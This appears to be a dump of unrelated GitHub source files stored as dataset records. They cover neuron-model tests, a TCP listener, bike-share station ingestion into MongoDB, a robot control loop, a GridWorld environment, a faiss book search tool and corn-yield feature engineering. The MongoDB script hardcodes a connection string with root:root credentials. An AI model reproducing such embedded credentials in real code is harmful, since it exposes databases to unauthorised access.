out,\n srcs = genrule_srcs,\n tools = [\"//:model_schema\"] + [tool],\n outs = [out],\n cmd = \" \".join(cmd),\n )\n outs += [out]\n\n native.filegroup(name = name, srcs = outs, visibility = visibility)\n","repo_name":"google/lullaby","sub_path":"dev/build_model.bzl","file_name":"build_model.bzl","file_ext":"bzl","file_size_in_byte":2638,"program_lang":"python","lang":"en","doc_type":"code","stars":1170,"dataset":"github-code","pt":"16"} +{"seq_id":"17417091053","text":"import pytest\nfrom pathlib import Path\nimport json\n\nfrom bluepyemodel.access_point import get_access_point\nfrom dictdiffer import diff\n\nTEST_ROOT = Path(__file__).parents[1]\nDATA = TEST_ROOT / \"test_data\"\n\n\n@pytest.fixture\ndef api_config():\n return {\n \"emodel\": \"cADpyr_L5TPC\",\n \"emodel_dir\": DATA,\n \"recipes_path\": DATA / \"config/recipes.json\",\n }\n\n\n@pytest.fixture\ndef db(api_config):\n return get_access_point(\"local\", **api_config)\n\n\ndef test_get_morphologies(db):\n morphology = db.get_morphologies()\n assert morphology[\"name\"] == \"C060114A5\"\n assert Path(morphology[\"path\"]).name == \"C060114A5.asc\"\n\n\ndef test_get_available_morphologies(db):\n names = db.get_available_morphologies()\n assert len(names) == 1\n assert list(names)[0] == \"C060114A5\"\n\n\ndef test_get_recipes(db):\n recipes = db.get_recipes()\n # json.dump(recipes, open(DATA / \"test_recipes.json\", \"w\"))\n expected_recipes = json.load(open(DATA / \"test_recipes.json\", \"r\"))\n assert list(diff(recipes, expected_recipes)) == []\n\n\ndef test_get_model_configuration(db):\n\n configuration = db.get_model_configuration()\n\n expected_parameters = json.load(open(DATA / \"test_parameters.json\", \"r\"))\n expected_mechanisms = json.load(open(DATA / \"test_mechanisms.json\", \"r\"))\n\n for p in configuration.parameters:\n assert p.location in expected_parameters[\"parameters\"]\n for ep in expected_parameters[\"parameters\"][p.location]:\n if ep[\"name\"] == p.name and ep[\"val\"] == p.value:\n break\n else:\n raise Exception(\"missing parameter\")\n\n assert sorted(list(configuration.mechanism_names)) == [\n \"CaDynamics_DC0\",\n \"Ca_HVA2\",\n \"Ca_LVAst\",\n \"Ih\",\n \"K_Pst\",\n \"K_Tst\",\n \"NaTg\",\n \"Nap_Et2\",\n \"SK_E2\",\n \"SKv3_1\",\n \"pas\",\n ]\n\n\ndef test_get_final(db):\n final = db.get_final()\n assert \"cADpyr_L5TPC\" in final\n assert \"parameters\" in final[\"cADpyr_L5TPC\"] or \"params\" in final[\"cADpyr_L5TPC\"]\n\n\ndef test_load_pipeline_settings(db):\n assert db.pipeline_settings.path_extract_config == \"tests/test_data/config/config_dict.json\"\n assert db.pipeline_settings.validation_protocols == [\"APWaveform_140\"]\n\n\ndef test_get_model_name_for_final(db):\n db.emodel_metadata.iteration = \"\"\n assert db.get_model_name_for_final(seed=42) == \"cADpyr_L5TPC__42\"\n db.emodel_metadata.iteration = None\n assert db.get_model_name_for_final(seed=42) == \"cADpyr_L5TPC__42\"\n db.emodel_metadata.iteration = \"hash\"\n assert db.get_model_name_for_final(seed=42) == \"cADpyr_L5TPC__hash__42\"\n\n\ndef test_get_ion_currents_concentrations(db):\n expected_ion_currents = {\n \"ica_Ca_HVA2\",\n \"ica_Ca_LVAst\",\n \"ik_K_Pst\",\n \"ik_K_Tst\",\n \"ina_NaTg\",\n \"ina_Nap_Et2\",\n \"ik_SK_E2\",\n \"ik_SKv3_1\",\n \"ihcn_Ih\",\n \"i_pas\",\n }\n expected_ionic_concentrations = {\n \"cai\",\n \"ki\",\n \"nai\",\n }\n ion_currents, ionic_concentrations = db.get_ion_currents_concentrations()\n assert set(ion_currents) == expected_ion_currents\n assert set(ionic_concentrations) == expected_ionic_concentrations\n","repo_name":"BlueBrain/BluePyEModel","sub_path":"tests/unit_tests/test_local_access_point.py","file_name":"test_local_access_point.py","file_ext":"py","file_size_in_byte":3218,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"43471419510","text":"#!/usr/bin/env python3\n\nimport datetime\nimport socket\n\n\nHOST = \"localhost\"\nPORT = 49281\n\nwith socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.bind((HOST, PORT))\n print(\"bound\")\n s.listen()\n print(f\"listening on {HOST}:{PORT}\")\n while True:\n conn, addr = s.accept()\n with conn:\n print(\"Connected by\", addr)\n buf = b\"\"\n old_rx_time = None\n old_time = 0\n times = []\n while True:\n try:\n data = conn.recv(1024)\n except OSError:\n break\n if not data:\n break\n\n rx_time = datetime.datetime.now()\n if old_rx_time is not None:\n delta = rx_time - old_rx_time\n else:\n delta = None\n old_rx_time = rx_time\n buf += data\n (*frames, buf) = buf.split(b\"\\r\")\n for frame in frames:\n if (\n not frame\n and delta is not None\n and delta > datetime.timedelta(seconds=0.9)\n ):\n times.append(delta.total_seconds())\n print(sum(times) / len(times))\n # conn.send(b\"ACK \" + frame + b\"\\r\")\n print(\"[{} ({})]: {}\".format(rx_time.isoformat(), delta, frame))\n print(\"disconnected\")\n","repo_name":"dtwood/paging-gpio-firmware","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"37054830706","text":"import requests\nimport json\nfrom pprint import pprint\nfrom pymongo import MongoClient\n\n\ndef get_vlille():\n url = \"https://opendata.lillemetropole.fr/api/records/1.0/search/?dataset=vlille-realtime&q=&rows=300&facet=libelle&facet=nom&facet=commune&facet=etat&facet=type&facet=etatconnexion\"\n\n response = requests.request(\"GET\", url, headers={}, data={})\n response_json = json.loads(response.text.encode('utf8'))\n return response_json.get(\"records\", [])\n\n\ndef get_vrennes():\n # url = \"https://data.rennesmetropole.fr/api/records/1.0/search/?dataset=etat-des-stations-le-velo-star-en-temps-reel&q=&facet=nom&facet=etat&facet=nombreemplacementsactuels&facet=nombreemplacementsdisponibles&facet=nombrevelosdisponibles\"\n url = \"https://data.rennesmetropole.fr/api/records/1.0/search/?dataset=stations_vls&q=&rows=3000\"\n\n response = requests.request(\"GET\", url, headers={}, data={})\n response_json = json.loads(response.text.encode('utf8'))\n return response_json.get(\"records\", [])\n\n\ndef get_vlyon():\n # url = \"https://download.data.grandlyon.com/ws/rdata/jcd_jcdecaux.jcdvelov/all.json?maxfeatures=100&start=1\"\n url = \"https://public.opendatasoft.com/api/records/1.0/search/?dataset=station-velov-grand-lyon&q=&facet=name&facet=status&rows=500\"\n\n response = requests.request(\"GET\", url, headers={}, data={})\n response_json = json.loads(response.text.encode('utf8'))\n return response_json.get(\"records\", [])\n\n\ndef get_vparis():\n url = \"https://opendata.paris.fr/api/records/1.0/search/?dataset=velib-disponibilite-en-temps-reel&q=&facet=name&facet=is_renting&rows=300\"\n # url = \"https://opendata.paris.fr/api/records/1.0/search/?dataset=velib-emplacement-des-stations&q=\"\n\n response = requests.request(\"GET\", url, headers={}, data={})\n response_json = json.loads(response.text.encode('utf8'))\n return response_json.get(\"records\", [])\n\n\nvlilles = get_vlille()\nvrennes = get_vrennes()\nvlyon = get_vlyon()\nvparis = get_vparis()\n\nvlliles_to_insert = [\n {\n 'name': elem.get('fields', {}).get('nom', ''),\n 'geometry': elem.get('geometry'),\n 'size': elem.get('fields', {}).get('nbvelosdispo') + elem.get('fields', {}).get('nbplacesdispo'),\n 'source': {\n 'dataset': 'Lille',\n 'id_ext': elem.get('fields', {}).get('libelle')\n },\n 'tpe': elem.get('fields', {}).get('type', '') == 'AVEC TPE',\n 'available': elem.get('fields', {}).get('etat', '') == 'EN SERVICE'\n }\n for elem in vlilles\n]\n\nvrennes_to_insert = [\n {\n 'name': elem.get('fields', {}).get('nom', ''),\n 'geometry': elem.get('geometry'),\n 'size': elem.get('fields', {}).get('nb_socles'),\n 'source': {\n 'dataset': 'Rennes',\n 'id_ext': elem.get('fields', {}).get('objectid')\n },\n 'tpe': elem.get('fields', {}).get('tpe', '') == 'oui',\n 'available': elem.get('fields', {}).get('etat', '') == 'Ouverte'\n }\n for elem in vrennes\n]\n\nvlyon_to_insert = [\n {\n 'name': elem.get('fields', {}).get('name', ''),\n 'geometry': elem.get('geometry'),\n 'size': elem.get('fields', {}).get('bike_stand'),\n 'source': {\n 'dataset': 'Lyon',\n 'id_ext': int(elem.get('fields', {}).get('gid'))\n },\n 'tpe': elem.get('fields', {}).get('banking', '') == 't',\n 'available': elem.get('fields', {}).get('status', '') == 'OPEN'\n }\n for elem in vlyon\n]\n\nvparis_to_insert = [\n {\n 'name': elem.get('fields', {}).get('name', ''),\n 'geometry': elem.get('geometry'),\n 'size': elem.get('fields', {}).get('capacity'),\n 'source': {\n 'dataset': 'Paris',\n 'id_ext': int(elem.get('fields', {}).get('stationcode'))\n },\n 'tpe': False,\n 'available': elem.get('fields', {}).get('is_renting', '') == 'OUI'\n }\n for elem in vparis\n]\n\npprint(vlliles_to_insert)\npprint(vrennes_to_insert)\npprint(vlyon_to_insert)\npprint(vparis_to_insert)\n\natlas = MongoClient('mongodb+srv://root:root@cluster0.8wh7w.mongodb.net/bicycle?retryWrites=true&w=majority')\n\ndb = atlas.bicycle\ndb.stations.create_index([(\"geometry\", \"2dsphere\")])\ndb.stations.insert_many(vlliles_to_insert)\ndb.stations.insert_many(vrennes_to_insert)\ndb.stations.insert_many(vlyon_to_insert)\ndb.stations.insert_many(vparis_to_insert)\n\n# for vlille in vlliles_to_insert:\n#\tdb.stations.insert_one(vlille)\n","repo_name":"JJFrenoi/ISEN-MONGO","sub_path":"programme_1.py","file_name":"programme_1.py","file_ext":"py","file_size_in_byte":4422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"23802300910","text":"#!/usr/bin/python2.7\r\n#\r\n# MAIN.PY IS AUTOMATICALLY STARTED ON REBOOT\r\n#\r\n\r\nimport cv2\r\nimport detect_object\r\nimport movement\r\nimport communication\r\nimport detect_aruco2\r\nimport numpy as np\r\nimport imutils\r\nimport time\r\n#from config import *\r\nimport config\r\nimport argparse\r\n\r\n#COLOR VALUES ARE MOVED TO CONFIG.PY, or more precisely into color_values.pkl,\r\n#which is written by hsv_range_detector.py\r\n\r\ncamera = cv2.VideoCapture(0)\r\n#camera.set(13, 0.40) #hue\r\n#camera.set(14, 0.04) #exposure\r\n\r\ncommunication.send_soon(\"init\")\r\n\r\n\r\nthrower_speed = 0\r\nlast_throw = time.time()\r\n\r\nblinds = cv2.imread('horseblinds.png', 0)\r\n\r\n\r\n'''Command line:\r\n Command line parameters are not saved anywhere, so use always when needed.\r\n Defaults are AA, off, blue.\r\n'''\r\nparser=argparse.ArgumentParser()\r\nparser.add_argument('--id', help='Field and robot: AA, AB, AC, BA...')\r\nparser.add_argument('--brakes', help='Emergency brake is on or not: on/off')\r\nparser.add_argument('--target', help='Where to throw: magenta or blue')\r\nparser.add_argument('--tambov', help='linear adjustment of throwing distance')\r\nargs=parser.parse_args()\r\n\r\nif not args.id is None:\r\n config.FIELD_ID = args.id[0]\r\n config.ROBOT_ID = args.id[1]\r\nif not args.brakes is None:\r\n config.BRAKES_ON = True if args.brakes=='on' else False\r\nif not args.target is None:\r\n config.TARGET_BASKET=args.target\r\n config.BASKET = config.MAGENTA_BASKET if args.target == 'magenta' else config.BLUE_BASKET\r\n\r\nif not args.tambov is None:\r\n detect_aruco2.TAMBOV = int(args.tambov)\r\nprint (detect_aruco2.TAMBOV)\r\n\r\n#print('PARAMS: FIELD=', FIELD_ID, ', ROBOT=', ROBOT_ID, ', BRAKES=', BRAKES_ON, ', TARGET=', TARGET_BASKET)\r\n#input()\r\n\r\nframestart = 0\r\ntry:\r\n while 1:\r\n\r\n (grabbed, frame) = camera.read()\r\n #print(\"grabbed = \",grabbed)\r\n frame = cv2.bitwise_and(frame, frame, mask = blinds)\r\n # resize the frame, blur it, and convert it to the HSV\r\n #frame = imutils.resize(frame, width=600)\r\n # blurred = cv2.GaussianBlur(frame, (11, 11), 0)\r\n hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\r\n\r\n ball_x1, ball_y1, ball_radius1, ball_center1, ball_mask = detect_object.find_ball(hsv, config.BALL_LOWER, config.BALL_UPPER)\r\n if ball_x1 >= 0:\r\n cv2.circle(frame, ball_center1, 10, (0, 0, 255), -1)\r\n cv2.imshow(\"mask\", ball_mask)\r\n\r\n basket_dist, basket_x, basket_corners, basket_ids = detect_aruco2.detect_basket(frame)\r\n basket_dist = detect_aruco2.gimme_running_average(basket_dist)\r\n\r\n amount_of_carpet = detect_object.percentage_of_color(hsv, config.CARPET_LOWER, config.CARPET_UPPER)\r\n\r\n\r\n communication.update_comms()\r\n print(\"ball_y = \", ball_y1)\r\n m1,m2,m3,thrower_speed = movement.get_command(ball_x1, ball_y1,ball_radius1, basket_x, basket_dist, amount_of_carpet)\r\n print(\"sent by the main: \",m1,m2,m3)\r\n\r\n communication.set_motors(m1,m2,m3)\r\n now = time.time()\r\n communication.update_comms()\r\n if thrower_speed > 0:\r\n communication.set_thrower(thrower_speed)\r\n last_throw = now\r\n elif (now - last_throw) >= 3:\r\n communication.set_thrower(0)\r\n communication.update_comms()\r\n\r\n\r\n\r\n cv2.putText(frame, \"CARPET: {}\".format(int(amount_of_carpet)),\r\n (50, 80), cv2.FONT_HERSHEY_SIMPLEX,\r\n 0.5, (0, 0, 255), 1)\r\n\r\n fps = round(1.0 / (time.time() - framestart))\r\n cv2.putText(frame, \"FPS: {}\".format( fps ),\r\n (50, 100), cv2.FONT_HERSHEY_SIMPLEX,\r\n 0.5, (0, 0, 255), 1)\r\n\r\n cv2.putText(frame, \"dx: {}, dy: {}, radius: {}\".format(int(ball_x1), int(ball_y1), int(ball_radius1)),\r\n (50, 50), cv2.FONT_HERSHEY_SIMPLEX,\r\n 0.35, (0, 0, 255), 1)\r\n\r\n cv2.putText(frame, str( movement.activeState ),\r\n (10, 420), cv2.FONT_HERSHEY_SIMPLEX,\r\n 0.45, (0, 0, 255), 1)\r\n\r\n cv2.line(frame, (320,100), (320,200), (0,0,255),1)\r\n\r\n cv2.imshow(\"Frame\", frame)\r\n framestart = time.time()\r\n\r\n\r\n key = cv2.waitKey(1) & 0xFF\r\n if key == ord(\"q\"):\r\n communication.send_now(\"sm:0:0:0\")\r\n communication.send_now(\"st:0\")\r\n break\r\n elif key == ord('b'):\r\n config.BRAKES_ON = not config.BRAKES_ON\r\n if config.BRAKES_ON:\r\n communication.send_now('sm:0:0:0')\r\n print (\"BRAKES!\")\r\n elif key == ord('p'): # take a screenshot\r\n cv2.imwrite('screenshot.png', frame)\r\n\r\n elif key == ord('w') and config.BRAKES_ON:\r\n communication.send_now('sm:-20:0:20')\r\n elif key == ord('s') and config.BRAKES_ON:\r\n communication.send_now('sm:20:0:-20')\r\n elif key == ord('a') and config.BRAKES_ON:\r\n communication.send_now('sm:-20:-20:-20')\r\n elif key == ord('d') and config.BRAKES_ON:\r\n communication.send_now('sm:20:20:20')\r\n\r\n elif key == 0xFF and config.BRAKES_ON:\r\n communication.send_soon('sm:0:0:0')\r\n\r\nexcept KeyboardInterrupt:\r\n communication.send_now(\"sm:0:0:0\")\r\n communication.send_now(\"st:0\")\r\n\r\ncamera.release()\r\ncv2.destroyAllWindows()\r\n","repo_name":"kadiraktass/robotex","sub_path":"software/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"23374857220","text":"import numpy as np\n\nclass GridWorld:\n def __init__(self, grid_size=5, wind=0.2):\n # (0,0) bottom left corner (x,y)\n self.names = [\"Right\", \"Down\", \"Left\", \"Up\"]\n self.actions = [(1,0),(0,1),(-1,0),(0,-1)]\n self.n_actions = len(self.actions)\n self.n_states = grid_size**2\n self.wind = float(wind)\n \n self.grid_size = grid_size\n self.grid = np.zeros((grid_size, grid_size))\n\n self.features = np.eye(self.n_states)\n self.dynamics = self.transition_probabilities()\n self.real_rewards = np.array([self.reward(s) for s in range(self.n_states)])\n self.state = 0\n\n\n def reward(self, state_p):\n return 1 if state_p == self.n_states-1 else 0\n \n\n def reset(self, random=False):\n if random:\n self.state = np.random.randint(self.n_states)\n else:\n self.state = 0\n return self.state\n\n\n def step(self, a):\n probs = self.dynamics[:, a, self.state]\n self.state = np.random.choice(self.n_states, p=probs)\n return self.state\n\n\n def transition_probabilities(self):\n dynamics = np.zeros((self.n_states, self.n_actions, self.n_states))\n # S_t+1, A_t, S_t\n for s in range(self.n_states):\n x, y = s%self.grid_size, s//self.grid_size\n for a in range(self.n_actions):\n x_a, y_a = self.actions[a]\n for d in range(self.n_actions):\n x_d, y_d = self.actions[d]\n if 0 <= x+x_d < self.grid_size and 0 <= y+y_d < self.grid_size:\n dynamics[(x+x_d) + (y+y_d)*self.grid_size, a, s] += self.wind/self.n_actions\n else:\n dynamics[s, a, s] += self.wind/self.n_actions\n if 0 <= x+x_a < self.grid_size and 0 <= y+y_a < self.grid_size:\n dynamics[(x+x_a) + (y+y_a)*self.grid_size, a, s] += 1 - self.wind\n else:\n dynamics[s, a, s] += 1 - self.wind\n \n return dynamics\n\n \n def test(self):\n for s in range(self.n_states):\n print(\"/// State: \", s)\n for a in range(self.n_actions):\n print(\"/// Action: \", self.names[a])\n probs = self.dynamics[:, a, s]\n print(probs.reshape(-1, self.grid_size))\n\n\n def optimal_policy(self, state):\n x, y = state%self.grid_size, state//self.grid_size\n if x > y:\n return 1\n elif x < y:\n return 0\n else:\n return np.random.randint(2)\n\n\n def generate_trajectories(self, num, length, policy=None):\n if not policy:\n policy = self.optimal_policy\n\n trajs = []\n for n in range(num):\n t = []\n state = self.reset()\n for i in range(length):\n action = policy(state)\n state_p = self.step(action)\n t.append([state, action])\n state = state_p\n trajs.append(t)\n return np.array(trajs)","repo_name":"TroddenSpade/Maximum-Entropy-Deep-IRL","sub_path":"envs/GridWorld.py","file_name":"GridWorld.py","file_ext":"py","file_size_in_byte":3086,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"16"} +{"seq_id":"20083184923","text":"# \n# cronned processes\n#\nimport time\nimport multiprocessing\nfrom threading import Thread, Event\nimport logging\nfrom file import DirectoryScanner, DiskScanner\n\ndef initCron(appContext):\n\tappContext.threads = []\n\n\tdirectoryScanner = DirectoryScanner(appContext )\n\tappContext.threads.append( RepeatingTimer( delay=30.0, target=directoryScanner.process ) )\n\n\tdiskScanner = DiskScanner(appContext)\n\tappContext.threads.append( RepeatingTimer( delay=30.0, target=diskScanner.process ) )\n\ndef startCron(appContext):\n\tfor thr in appContext.threads:\n\t\tthr.start()\n\nclass RepeatingTimer(Thread):\n\tdef __init__(self, delay=15, maxIterations=0, target=None):\n\t\tThread.__init__(self)\n\t\tself.daemon = True\n\t\tself.delay = delay\n\t\tself.target = target\n\t\tself.maxIterations = maxIterations\n\t\tself.finished = Event()\n\n\tdef run(self):\n\t\tcurrentIteration = 0\n\t\twhile not self.finished.isSet() and (self.maxIterations <= 0 or currentIteration < self.maxIterations):\n\t\t\tself.finished.wait( self.delay)\n\t\t\tif not self.finished.isSet():\n\t\t\t\tself.target()\n\t\t\t\tcurrentIteration += 1\n\n\tdef cancel(self):\n\t\tself.finished.set()\n","repo_name":"ickyfehmleh/hoarder","sub_path":"app/cron/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"71018146249","text":"import pickle\nimport re\nfrom pathlib import Path\nfrom typing import Dict, List\n\nimport faiss\nimport numpy as np\nimport spacy\nimport wikipedia\nfrom loguru import logger\nfrom pydantic import BaseModel\nfrom sentence_transformers import SentenceTransformer\nfrom tqdm import tqdm\n\nfrom discworld_hex.book import Book, BookText\nfrom discworld_hex.sections import SECTIONS\n\nmodel = SentenceTransformer()\n\n\nclass Library(BaseModel):\n name: str\n books: List[Book] = []\n\n sentence_splitter_model: spacy.Language = None\n encoder_model: SentenceTransformer = None\n\n sentence_index: faiss.IndexFlatL2 = None\n sentence_index_to_book_text: Dict[int, BookText] = {}\n\n _plot_regex = re.compile(r\"(?:== (?:Plot|Synopsis)[^\\n]+$)\\s*(.+?)\\s*^== \", re.MULTILINE | re.S)\n\n class Config:\n arbitrary_types_allowed = True\n\n @classmethod\n def from_book_page_names(\n cls, name: str, book_page_names: List[str], sentence_splitter_model=None, encoder_model=None, limit: int = 0\n ):\n\n if limit > 0:\n book_page_names = book_page_names[:limit]\n\n logger.info(f\"Library {name} initialising from books with page names: {', '.join(book_page_names)}\")\n\n books = []\n for b in tqdm(book_page_names):\n book = Book.from_page(wikipedia.page(b, auto_suggest=False, redirect=False, preload=False))\n\n book.parse_plot()\n if not book.plot:\n logger.warning(f\"{book.name} has no plot, not adding it.\")\n continue\n\n book.parse_plot_paragraphs()\n book.parse_sentences(sentence_splitter_model)\n book.encode_sentences(encoder_model)\n books.append(book)\n\n if len(books) <= 0:\n raise ValueError(\"No books were added\")\n\n logger.success(\n f\"{len(books)} books loaded, parsed and encoded successfully: {', '.join(b.name for b in books)}\"\n )\n\n return Library(\n name=name,\n books=books,\n sentence_splitter_model=sentence_splitter_model,\n encoder_model=encoder_model,\n )\n\n def build_index(self):\n\n tensors = np.stack([book_sentences for book in self.books for book_sentences in book.plot_sentences_encoded])\n\n logger.info(f\"Building index from {tensors.shape[0]} sentences.\")\n\n tensor_id = 0\n for book in self.books:\n for sentence in book.plot_sentences:\n self.sentence_index_to_book_text[tensor_id] = BookText(book, sentence)\n tensor_id += 1\n\n index = faiss.IndexFlatL2(tensors.shape[1])\n index.add(tensors)\n\n assert index.is_trained\n\n logger.success(\n f\"Sentence index built, contains {tensors.shape[0]} sentences with {tensors.shape[1]} elements each.\"\n )\n self.sentence_index = index\n\n def save(self, path: Path = None):\n path = path or Path.home()\n path = path / f\"{self.name}.pkl\"\n\n logger.info(f\"Saving library to {path}\")\n with open(path, \"wb\") as f:\n pickle.dump(self, f, pickle.HIGHEST_PROTOCOL)\n logger.success(f\"Saved library to {path}\")\n\n @classmethod\n def load(cls, path: Path):\n logger.info(f\"Loading library from {path}\")\n\n with open(path, \"rb\") as f:\n library = pickle.load(f)\n\n logger.success(f\"Library {library.name} loaded!\")\n return library\n\n def search_interactive(self, k):\n logger.info(\n f\"Searching the {self.name} library interactively.\\n\"\n f\"Available books: {len(self.books)} – {', '.join(b.name for b in self.books)}\\n\"\n f\"Looking at {k} nearest neighbours.\"\n )\n\n while True:\n sentence = input(\"Input a sentence: \")\n\n sentence_encoded = self.encoder_model.encode(sentence)\n distances, indices = self.sentence_index.search(np.stack([sentence_encoded]), k)\n\n logger.debug(f\"distances: {distances}, indices: {indices}\")\n\n # we assume only one sentence query here:\n distances = distances[0]\n indices = indices[0]\n\n for rank in range(k):\n i = indices[rank]\n book, text = self.sentence_index_to_book_text[i]\n print(f\"{(rank + 1):>3}. {text}\")\n print(f\" – {book.name}, distance: {distances[rank]:.2f}\\n\")\n\n\ndef build_library(\n name: str = \"Discworld\",\n book_page_names: List[str] = SECTIONS[\"Discworld\"],\n sentence_splitter_model_name: str = \"en_core_web_sm\",\n encoder_model_name: str = \"all-mpnet-base-v2\",\n limit: int = 0,\n path: Path = None,\n):\n logger.info(f\"Loading sentence splitter model {sentence_splitter_model_name}\")\n sentence_splitter_model = spacy.load(sentence_splitter_model_name)\n\n logger.info(f\"Loading encoder model {encoder_model_name}\")\n encoder_model = SentenceTransformer(encoder_model_name)\n\n library = Library.from_book_page_names(\n name=name,\n book_page_names=book_page_names,\n sentence_splitter_model=sentence_splitter_model,\n encoder_model=encoder_model,\n limit=limit,\n )\n library.build_index()\n library.save(path=path)\n\n\ndef search_library(path: Path = Path.home() / \"Discworld.pkl\", k: int = 4):\n library = Library.load(path=path)\n\n library.search_interactive(k)\n\n\nif __name__ == \"__main__\":\n build_library()\n\n search_library()\n","repo_name":"MikulasZelinka/discworld-hex","sub_path":"src/discworld_hex/library.py","file_name":"library.py","file_ext":"py","file_size_in_byte":5430,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"1941098720","text":"\"\"\"\n@author: Mohsen\nML+APSIM for Corn Yield Prediction\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport random\nimport os\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import preprocessing\nfrom sklearn.preprocessing import StandardScaler, OneHotEncoder, MinMaxScaler\nfrom sklearn import linear_model\nfrom sklearn.linear_model import Lasso, ElasticNet, Ridge, LassoCV\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.neural_network import MLPRegressor\nfrom xgboost.sklearn import XGBRegressor\nfrom lightgbm import LGBMRegressor\nfrom scipy.optimize import minimize\nfrom sklearn.metrics import mean_squared_error as mse\nfrom sklearn.model_selection import cross_val_score, cross_val_predict, cross_validate, KFold\nfrom sklearn import metrics\nfrom sklearn.model_selection import RandomizedSearchCV, TimeSeriesSplit\nimport time\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.datasets import load_boston\nfrom sklearn.feature_selection import RFE\nimport warnings\nfrom scipy.io import loadmat\nfrom sklearn.model_selection import LeavePGroupsOut, GridSearchCV, GroupKFold\nfrom hyperopt import STATUS_OK\nfrom hyperopt import hp\nfrom hyperopt import tpe\nfrom hyperopt import Trials\nfrom hyperopt import fmin\nimport os\nfrom pathlib import Path\n\n\nwarnings.filterwarnings('ignore')\n\npd.set_option('display.max_columns', 500)\nnp.random.seed(1369)\npopulation = loadmat('INFO_POPULATION.mat')['INFO_POPULATION']\nprogress = loadmat('INFO_PROGRESS.mat')['INFO_PROGRESS']\nsoil = loadmat('INFO_SOIL.mat')['INFO_SOIL']\nYield = pd.DataFrame(loadmat('INFO_Yield.mat')['INFO_Yield'], columns =['year', 'state', 'county', 'yield'])\n\nweather = pd.read_parquet('main_weather_final.parquet')\nweather = weather[(weather.year >= 1984)&(weather.year <= 2018)]\nweather.state = weather.state.astype('int')\nweather.county = weather.county.astype('int')\nweather.year = weather.year.astype('int')\n\n# Constructing quarterly and cumulative weather features\nweather['prcp_Q2'] = weather.loc[:,'prcp_14':'prcp_26'].sum(axis=1)\nweather['prcp_Q3'] = weather.loc[:,'prcp_27':'prcp_39'].sum(axis=1)\nweather['prcp_Q4'] = weather.loc[:,'prcp_40':'prcp_52'].sum(axis=1)\nweather['prcp_Q1:Q2'] = weather.loc[:,'prcp_1':'prcp_26'].sum(axis=1)\nweather['prcp_Q1:Q3'] = weather.loc[:,'prcp_1':'prcp_39'].sum(axis=1)\nweather['prcp_Q1:Q4'] = weather.loc[:,'prcp_1':'prcp_52'].sum(axis=1)\n\nweather['tmax_Q2'] = weather.loc[:,'tmax_14':'tmax_26'].mean(axis=1)\nweather['tmax_Q3'] = weather.loc[:,'tmax_27':'tmax_39'].mean(axis=1)\nweather['tmax_Q4'] = weather.loc[:,'tmax_40':'tmax_52'].mean(axis=1)\nweather['tmax_Q1:Q2'] = weather.loc[:,'tmax_1':'tmax_26'].mean(axis=1)\nweather['tmax_Q1:Q3'] = weather.loc[:,'tmax_1':'tmax_39'].mean(axis=1)\nweather['tmax_Q1:Q4'] = weather.loc[:,'tmax_1':'tmax_52'].mean(axis=1)\n\nweather['tmin_Q2'] = weather.loc[:,'tmin_14':'tmin_26'].mean(axis=1)\nweather['tmin_Q3'] = weather.loc[:,'tmin_27':'tmin_39'].mean(axis=1)\nweather['tmin_Q4'] = weather.loc[:,'tmin_40':'tmin_52'].mean(axis=1)\nweather['tmin_Q1:Q2'] = weather.loc[:,'tmin_1':'tmin_26'].mean(axis=1)\nweather['tmin_Q1:Q3'] = weather.loc[:,'tmin_1':'tmin_39'].mean(axis=1)\nweather['tmin_Q1:Q4'] = weather.loc[:,'tmin_1':'tmin_52'].mean(axis=1)\n\nweather['gddf_Q2'] = weather.loc[:,'gddf_14':'gddf_26'].sum(axis=1)\nweather['gddf_Q3'] = weather.loc[:,'gddf_27':'gddf_39'].sum(axis=1)\nweather['gddf_Q4'] = weather.loc[:,'gddf_40':'gddf_52'].sum(axis=1)\nweather['gddf_Q1:Q2'] = weather.loc[:,'gddf_1':'gddf_26'].sum(axis=1)\nweather['gddf_Q1:Q3'] = weather.loc[:,'gddf_1':'gddf_39'].sum(axis=1)\nweather['gddf_Q1:Q4'] = weather.loc[:,'gddf_1':'gddf_52'].sum(axis=1)\n\nweather['srad_Q2'] = weather.loc[:,'srad_14':'srad_26'].sum(axis=1)\nweather['srad_Q3'] = weather.loc[:,'srad_27':'srad_39'].sum(axis=1)\nweather['srad_Q4'] = weather.loc[:,'srad_40':'srad_52'].sum(axis=1)\nweather['srad_Q1:Q2'] = weather.loc[:,'srad_1':'srad_26'].sum(axis=1)\nweather['srad_Q1:Q3'] = weather.loc[:,'srad_1':'srad_39'].sum(axis=1)\nweather['srad_Q1:Q4'] = weather.loc[:,'srad_1':'srad_52'].sum(axis=1)\n\n\n# Removing weather data after harvesting and before next planting date\nidx = list(['state', 'county', 'year']) + \\\n list(weather.loc[:,'prcp_16':'prcp_43'].columns) + \\\n list(weather.loc[:,'tmax_16':'tmax_43'].columns) + \\\n list(weather.loc[:,'tmin_16':'tmin_43'].columns) + \\\n list(weather.loc[:,'gddf_16':'gddf_43'].columns) + \\\n list(weather.loc[:,'srad_16':'srad_43'].columns) + \\\n list(weather.loc[:, 'prcp_Q2':])\nweather = weather[idx]\n\n\ncv = 10\n\n# Importing APSIM variables\ndata_d = pd.read_csv('data_all_apsim.csv', index_col=0)\n\n\n\n## ----------------- data preprocessing ----------------- ##\n\n\n# Feature construction 